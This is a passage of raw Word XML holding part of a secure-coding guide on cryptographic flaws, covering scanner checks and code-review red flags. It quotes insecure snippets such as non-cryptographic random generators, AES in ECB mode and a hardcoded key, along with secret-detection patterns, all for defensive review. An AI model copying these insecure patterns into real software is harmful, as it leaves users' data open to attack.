      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>Math.random</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ) within authentication or token-generation contexts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC0448B" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="102"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Hardcoded Secrets:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> High-entropy strings, variable names containing </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>secret</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>private_key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>passwd</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , or pattern matches for RSA/EC private keys and cloud provider tokens checked into the repository.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1287B9" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="102"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Insecure Cipher Modes:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Identification of block cipher configurations explicitly set to Electronic Codebook (ECB) mode instead of Galois/Counter Mode (GCM) or Cipher Block Chaining (CBC) with unique Initialization Vectors (IVs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEDAE61" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="102"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Dynamic Application Security Testing (DAST) &amp; Vulnerability Scanners:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> DAST tools evaluate the application from the outside in a running state. Because they </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>cannot see the code execution or internal backend storage, they focus on transport layer anomalies and exposed responses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B47A7EB" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="102"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Missing or Weak TLS/SSL Transport:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Identifying HTTP endpoints that fail to redirect to HTTPS, or endpoints accepting deprecated protocols (TLS 1.0/1.1) and weak cipher suites.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57018C68" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="102"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Missing Security Headers:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Flags indicating the absence of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>StrictTransport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>-Security</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (HSTS) headers, which enforce HTTPS connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717447CC" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="102"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Information Leakage in Error Messages:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Spotting detailed cryptographic runtime exceptions (e.g., "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>PaddingException</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>" or "Decryption failed") inside server responses that could be leveraged for side-channel attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F34B08" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="102"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Weak Cache Control:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Analyzing headers like </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>Cache-Control</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> on pages handling sensitive personal or financial data to ensure data is not cached by intermediate proxies or CDNs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5492375D" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Manual Code Review</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0862D33D"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During a manual code review, a security analyst bypasses automated tool limitations by tracing business logic, verifying how data is classified, and inspecting how cryptographic libraries are configured. The following patterns represent immediate "red flags":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524E8694"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1. Insecure Pseudorandom Number Generation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298DB72E"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Look for instances where randomness is generated using standard mathematical libraries rather than cryptographically secure wrappers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB92A44" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="103"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Red Flag Examples:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26974247" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="103"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Java:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>Random rand = new Random();</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> instead of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>SecureRandom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D673E3" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="103"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Python:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t xml:space="preserve">import random; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>random.randint</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> instead of </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>import secrets</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252899FE" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="103"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>C++:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>std::rand()</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>std::mt19937</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> seeded with the system time, rather than </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>std::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>random_device</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A8668A"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2. Insecure Modes of Operation &amp; Lack of Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547277A0"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Search for configurations where encryption is applied without authentication safeguards, or block ciphers are implemented using insecure modes like ECB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46641781" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="104"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Red Flag Patterns:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E69CAA" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="104"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>Cipher.getInstance</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>("AES/ECB/PKCS5Padding")</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>ECB mode encrypts identical plaintext blocks into identical ciphertext blocks, revealing patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1214CF59" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="104"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Use of pure AES-CBC encryption without a paired Hash-based Message Authentication Code (HMAC) to verify integrity, opening the door to padding oracle attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4363358A"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3. Hardcoded Credentials &amp; Flawed Key Derivation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5009CF6A"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Trace how keys are loaded into memory and how user-supplied passwords are turned into cryptographic keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2366FF02" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="105"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Red Flag Patterns:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4151BFFA" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="105"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>byte[] key = "MySuperSecretKey123".getBytes();</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Hardcoded cryptographic keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783EA1E6" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="105"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Using raw passwords directly as encryption keys without using a dedicated Key Derivation Function (KDF) like PBKDF2, Argon2, or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>scrypt</w:t>
